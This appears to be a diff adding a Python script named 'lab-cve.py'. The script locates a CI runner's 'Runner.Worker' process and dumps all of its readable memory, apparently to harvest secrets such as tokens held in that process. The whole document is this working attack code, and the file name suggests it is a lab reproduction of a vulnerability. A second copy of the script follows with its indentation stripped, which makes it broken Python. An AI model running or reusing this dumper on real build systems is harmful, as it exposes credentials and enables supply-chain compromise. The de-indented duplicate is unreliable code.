edsoncelio · March 19, 2025 01:37
diff --git a/lab-cve.py b/lab-cve.py
 #!/usr/bin/env python3

 import os
 import re
 import sys

 def get_pid():
    """Finds the PID of a process containing 'Runner.Worker' in its cmdline."""
    for pid in os.listdir('/proc'):
        if pid.isdigit():
            try:
                with open(os.path.join('/proc', pid, 'cmdline'), 'rb') as cmdline_f:
                    if b'Runner.Worker' in cmdline_f.read():
                        return pid
            except (OSError, FileNotFoundError):
                continue
    raise Exception('Cannot get PID of Runner.Worker')

 if __name__ == "__main__":
    try:
        pid = get_pid()
        print(f"Found PID: {pid}", file=sys.stderr)
    except Exception as e:
        print(f"Error: {e}", file=sys.stderr)
        sys.exit(1)
    
    map_path = f"/proc/{pid}/maps"
    mem_path = f"/proc/{pid}/mem"

    try:
        with open(map_path, 'r') as map_f, open(mem_path, 'rb', 0) as mem_f:
            for line in map_f:
                m = re.match(r'([0-9A-Fa-f]+)-([0-9A-Fa-f]+)\s+([r-])', line)
                if m and m.group(3) == 'r':  # Check if the region is readable
                    start = int(m.group(1), 16)
                    end = int(m.group(2), 16)
                    
                    # Skip memory regions that exceed sys.maxsize
                    if start > sys.maxsize:
                        continue
                    
                    mem_f.seek(start)
                    try:
                        chunk = mem_f.read(end - start)
                        sys.stdout.buffer.write(chunk)
                    except OSError:
                        continue
    except FileNotFoundError:
        print(f"Error: Process {pid} no longer exists.", file=sys.stderr)
        sys.exit(1)
    except PermissionError:
        print("Error: Permission denied. Try running as root.", file=sys.stderr)
        sys.exit(1)
	#!/usr/bin/env python3

	import os
	import re
	import sys

	def get_pid():
	"""Finds the PID of a process containing 'Runner.Worker' in its cmdline."""
	for pid in os.listdir('/proc'):
	if pid.isdigit():
	try:
	with open(os.path.join('/proc', pid, 'cmdline'), 'rb') as cmdline_f:
	if b'Runner.Worker' in cmdline_f.read():
	return pid
	except (OSError, FileNotFoundError):
	continue
	raise Exception('Cannot get PID of Runner.Worker')

	if __name__ == "__main__":
	try:
	pid = get_pid()
	print(f"Found PID: {pid}", file=sys.stderr)
	except Exception as e:
	print(f"Error: {e}", file=sys.stderr)
	sys.exit(1)

	map_path = f"/proc/{pid}/maps"
	mem_path = f"/proc/{pid}/mem"

	try:
	with open(map_path, 'r') as map_f, open(mem_path, 'rb', 0) as mem_f:
	for line in map_f:
	m = re.match(r'([0-9A-Fa-f]+)-([0-9A-Fa-f]+)\s+([r-])', line)
	if m and m.group(3) == 'r': # Check if the region is readable
	start = int(m.group(1), 16)
	end = int(m.group(2), 16)

	# Skip memory regions that exceed sys.maxsize
	if start > sys.maxsize:
	continue

	mem_f.seek(start)
	try:
	chunk = mem_f.read(end - start)
	sys.stdout.buffer.write(chunk)
	except OSError:
	continue
	except FileNotFoundError:
	print(f"Error: Process {pid} no longer exists.", file=sys.stderr)
	sys.exit(1)
	except PermissionError:
	print("Error: Permission denied. Try running as root.", file=sys.stderr)
	sys.exit(1)